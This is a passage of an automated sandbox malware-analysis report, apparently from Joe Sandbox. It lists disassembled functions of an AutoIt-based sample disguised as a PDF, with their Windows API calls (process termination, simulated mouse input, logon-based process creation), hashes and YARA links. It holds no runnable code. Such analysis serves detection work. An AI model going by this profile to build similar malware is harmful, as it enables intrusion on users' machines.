                                                    • Opcode Fuzzy Hash: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                                    • Instruction Fuzzy Hash: D7414934601151EFDB23CF29C499F947BE9FB4A304F5981B9FA588F2A2C731A842CB51
                                                    Function 003898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003898D1
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00389908
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00389924
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0038999E
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003899B3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003899D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 2537439066-0
                                                    • Opcode ID: 3442cf7d389bc46d57c3528eb524af21586e2ff7f346d67e3f033845145a39df
                                                    • Instruction ID: d4655f2b14e37f3da731991401e77713dbb2cb6564ab06d30d349ec468536097
                                                    • Opcode Fuzzy Hash: 3442cf7d389bc46d57c3528eb524af21586e2ff7f346d67e3f033845145a39df
                                                    • Instruction Fuzzy Hash: E6315071900205EFDB12AF95DC85EAAB778FF45311F1480B9F904EB256D774EA14CBA0
                                                    Function 00399B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,003977F4,?,?,00000000,00000001), ref: 00399B53
                                                      • Part of subcall function 00396544: GetWindowRect.USER32(?,?), ref: 00396557
                                                    • GetDesktopWindow.USER32 ref: 00399B7D
                                                    • GetWindowRect.USER32(00000000), ref: 00399B84
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00399BB6
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    • GetCursorPos.USER32(?), ref: 00399BE2
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00399C44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                                    • Instruction ID: 27886254afa825554dd752843f187d3fae38fbddfba3e178e39c9f1e13b119d7
                                                    • Opcode Fuzzy Hash: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                                    • Instruction Fuzzy Hash: BF31CE72104309ABCB11DF58DC49F9AB7EDFF89314F01092AF599E7181DA31EA04CB92
                                                    Function 0037AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0037AFAE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0037AFB5
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0037AFC4
                                                    • CloseHandle.KERNEL32(00000004), ref: 0037AFCF
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0037AFFE
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0037B012
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                                    • Instruction ID: 59c3f697284a20f1de13860465e0c3d589817398381b45c9fc7b5b4807896afa
                                                    • Opcode Fuzzy Hash: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                                    • Instruction Fuzzy Hash: 9D214C7210560DABDB238F98DD09FAE7BADAB84304F058025FA05E6161C37A9D21EB61
                                                    Function 003AEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                      • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003AEC20
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 003AEC34
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEC42
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 003AEC52
                                                    • EndPath.GDI32(00000000), ref: 003AEC62
                                                    • StrokePath.GDI32(00000000), ref: 003AEC72
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                                    • Instruction ID: 10e02693e4281ec42ee04cdb540c3ab8c68ac7eb6dcfd8681340797fc92827ff
                                                    • Opcode Fuzzy Hash: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                                    • Instruction Fuzzy Hash: 9E110972000159BFEB029F94DD88EEA7F6DEB08360F048126FE0899170D771AD55DBA0
                                                    Function 0037E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0037E1C0
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037E1D1
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037E1D8
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0037E1E0
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037E1F7
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0037E209
                                                      • Part of subcall function 00379AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00379A05,00000000,00000000,?,00379DDB), ref: 0037A53A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                    • String ID:
                                                    • API String ID: 603618608-0
                                                    • Opcode ID: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                                    • Instruction ID: be28ea4040b067acb2f7443fc8f8100f599c510af706fc6a769e87031e65c7dc
                                                    • Opcode Fuzzy Hash: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                                    • Instruction Fuzzy Hash: F40184B5A00214BFEB119BA5DC45F5EBFB8EB48351F018066FA08E7290D6719C00CF60
                                                    Function 00367B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 00367B47
                                                      • Part of subcall function 0036123A: __initp_misc_winsig.LIBCMT ref: 0036125E
                                                      • Part of subcall function 0036123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00367F51
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00367F65
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00367F78
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00367F8B
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00367F9E
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00367FB1
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00367FC4
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00367FD7
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00367FEA
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00367FFD
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00368010
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00368023
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00368036
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00368049
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0036805C
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0036806F
                                                    • __mtinitlocks.LIBCMT ref: 00367B4C
                                                      • Part of subcall function 00367E23: InitializeCriticalSectionAndSpinCount.KERNEL32(003FAC68,00000FA0,?,?,00367B51,00365E77,003F6C70,00000014), ref: 00367E41
                                                    • __mtterm.LIBCMT ref: 00367B55
                                                      • Part of subcall function 00367BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00367B5A,00365E77,003F6C70,00000014), ref: 00367D3F
                                                      • Part of subcall function 00367BBD: _free.LIBCMT ref: 00367D46
                                                      • Part of subcall function 00367BBD: DeleteCriticalSection.KERNEL32(003FAC68,?,?,00367B5A,00365E77,003F6C70,00000014), ref: 00367D68
                                                    • __calloc_crt.LIBCMT ref: 00367B7A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00367BA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 2942034483-0
                                                    • Opcode ID: a0dbb8e25f55c901fc72e71586ba824f6ccc91545f77a38f7aa7b19ead3e39ed
                                                    • Instruction ID: 749b4f9549311b38d64db38eb8f98767f8878257c7b3470e738a119fa2c3f908
                                                    • Opcode Fuzzy Hash: a0dbb8e25f55c901fc72e71586ba824f6ccc91545f77a38f7aa7b19ead3e39ed
                                                    • Instruction Fuzzy Hash: 01F0F63211C71119E6277B347C0BA4A26D49F0177CFB1C699F874CE1DDFF2188418160
                                                    Function 003427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0034281D
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00342825
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00342830
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0034283B
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00342843
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034284B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                                    • Instruction ID: 1f477a96a6675248c5c5114fe51b1dc9ff7d9e9e1e6656008233e13cb4c09c64
                                                    • Opcode Fuzzy Hash: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                                    • Instruction Fuzzy Hash: C70167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5B864CBE5
                                                    Function 00389AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 1423608774-0
                                                    • Opcode ID: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                                    • Instruction ID: 198deadfc95f0b73dc454a571002de4ffd4c9ae2c6a7aea46cfb8d7b300b7ba0
                                                    • Opcode Fuzzy Hash: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                                    • Instruction Fuzzy Hash: 91016236101311ABD71B3B64EC88EBB7769BF88701B09046AF503D6090DB68A801DB50
                                                    Function 00387BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00387C07
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00387C1D
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00387C2C
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C3B
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C45
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C4C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                                    • Instruction ID: 7402b2c631e80050901b9b5598cd48022b576b65c707389c0a4158567e5aca45
                                                    • Opcode Fuzzy Hash: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                                    • Instruction Fuzzy Hash: E7F05E76241158BBE7225B529C0EEEFBF7CEFC6B11F000068FA01D1151EBA06A41C7B5
                                                    Function 00389A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00389A33
                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A44
                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A51
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A5E
                                                      • Part of subcall function 003893D1: CloseHandle.KERNEL32(?,?,00389A6B,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 003893DB
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00389A71
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                                    • Instruction ID: 888a656e4762e63aa23637427b8c8d6dba5f537ee0bc72c27d7c183b3014058a
                                                    • Opcode Fuzzy Hash: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                                    • Instruction Fuzzy Hash: F5F05E36141211ABD7172BA4EC89EAA772DFF84301F190876F503D50A0DBB9A801DB50
                                                    Function 00341CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • __swprintf.LIBCMT ref: 00341EA6
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00341D49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 2125237772-557222456
                                                    • Opcode ID: 6d54e1843eeccd54e5ed42956583eb882827c4fa6ac375cbab7f2f38bf9a91b8
                                                    • Instruction ID: 27c6bfe44b53ac884f4e348dbd1aa4f6b032b87639554bc53eb5801be0ac984f
                                                    • Opcode Fuzzy Hash: 6d54e1843eeccd54e5ed42956583eb882827c4fa6ac375cbab7f2f38bf9a91b8
                                                    • Instruction Fuzzy Hash: 909169711142019FC726EF25C896CABB7E8EF85700F014929F9859F2A1DB60FE44CB92
                                                    Function 0039AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0039B006
                                                    • CharUpperBuffW.USER32(?,?), ref: 0039B115
                                                    • VariantClear.OLEAUT32(?), ref: 0039B298
                                                      • Part of subcall function 00389DC5: VariantInit.OLEAUT32(00000000), ref: 00389E05
                                                      • Part of subcall function 00389DC5: VariantCopy.OLEAUT32(?,?), ref: 00389E0E
                                                      • Part of subcall function 00389DC5: VariantClear.OLEAUT32(?), ref: 00389E1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                                    • Instruction ID: 01e8f49947b6efb1bfe7c709583ba47fa7f3009c7d72d66e56df4d3a07e6b68b
                                                    • Opcode Fuzzy Hash: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                                    • Instruction Fuzzy Hash: 49916A746083019FCB12DF24D58595BBBE8EF89704F04486EF89A9B362DB31ED05CB52
                                                    Function 00385347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • _memset.LIBCMT ref: 00385438
                                                    • GetMenuItemInfoW.USER32(?), ref: 00385467
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00385513
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0038553D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
